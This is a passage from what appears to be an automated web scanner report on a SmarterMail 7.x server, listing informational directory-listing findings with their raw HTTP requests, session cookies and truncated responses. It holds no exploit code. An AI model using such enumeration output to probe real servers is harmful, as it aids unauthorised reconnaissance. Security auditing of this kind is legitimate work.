GET /App_Themes/Default/Controls/Window/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 1413
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:blac
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Window/">[To Parent Directory]</A>
...[SNIP]...

12.35. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Flash/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Flash/

Request

GET /App_Themes/Default/Flash/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1706
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Flash/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.36. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/

Request

GET /App_Themes/Default/Images/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCompose.aspx?popup=true
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:54 GMT
Content-Length: 2178
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.37. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/16x16/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/16x16/

Request

GET /App_Themes/Default/Images/16x16/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:54 GMT
Content-Length: 18822
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/16x16/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.38. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Customer/

Request

GET /App_Themes/Default/Images/Customer/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 3294
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Customer/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.39. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/Pager/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Customer/Pager/

Request

GET /App_Themes/Default/Images/Customer/Pager/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:06 GMT
Content-Length: 2842
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Customer/Pager/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Customer/">[To Parent Directory]</A>
...[SNIP]...

12.40. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Icons/

Request

GET /App_Themes/Default/Images/Icons/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 1786
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Icons/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.41. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/IconMenuStats/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Icons/IconMenuStats/

Request

GET /App_Themes/Default/Images/Icons/IconMenuStats/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:06 GMT
Content-Length: 1717
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Icons/IconMenuStats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;col
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Icons/">[To Parent Directory]</A>
...[SNIP]...

12.42. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Icons/MessageView/

Request

GET /App_Themes/Default/Images/Icons/MessageView/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:06 GMT
Content-Length: 2628
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Icons/MessageView/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Icons/">[To Parent Directory]</A>
...[SNIP]...

12.43. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/rollover/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Icons/MessageView/rollover/

Request

GET /App_Themes/Default/Images/Icons/MessageView/rollover/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:18 GMT
Content-Length: 2196
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Icons/MessageView/rollover/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size:
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Icons/MessageView/">[To Parent Directory]</A>
...[SNIP]...

12.44. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Invitations/

Request

GET /App_Themes/Default/Images/Invitations/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 3305
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Invitations/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.45. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/Button/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Invitations/Button/

Request

GET /App_Themes/Default/Images/Invitations/Button/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:06 GMT
Content-Length: 2415
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Invitations/Button/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;colo
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Invitations/">[To Parent Directory]</A>
...[SNIP]...

12.46. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Misc/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Misc/

Request

GET /App_Themes/Default/Images/Misc/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 7465
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Misc/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.47. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Pager/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Pager/

Request

GET /App_Themes/Default/Images/Pager/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 2815
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Pager/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.48. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Plupload/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Plupload/

Request

GET /App_Themes/Default/Images/Plupload/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 2055
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Plupload/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.49. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Skin/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Skin/

Request

GET /App_Themes/Default/Images/Skin/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 5435
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Skin/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.50. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Stats/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Stats/

Request

GET /App_Themes/Default/Images/Stats/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 1396
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Stats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.51. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/social_icons/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/social_icons/

Request

GET /App_Themes/Default/Images/social_icons/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 2973
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/social_icons/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:blac
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.52. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Javascript/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Javascript/

Request

GET /App_Themes/Default/Javascript/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1375
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Javascript/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.53. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Sounds/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Sounds/

Request

GET /App_Themes/Default/Sounds/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1985
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Sounds/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.54. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/icons/dragdrop/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/images/icons/dragdrop/

Request

GET /App_Themes/Default/images/icons/dragdrop/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1509
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/dragdrop/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>
...[SNIP]...

12.55. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/icons/iconmenu/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/images/icons/iconmenu/

Request

GET /App_Themes/Default/images/icons/iconmenu/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1707
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/iconmenu/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>
...[SNIP]...

12.56. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/misc/tree/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/images/misc/tree/

Request

GET /App_Themes/Default/images/misc/tree/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Misc/
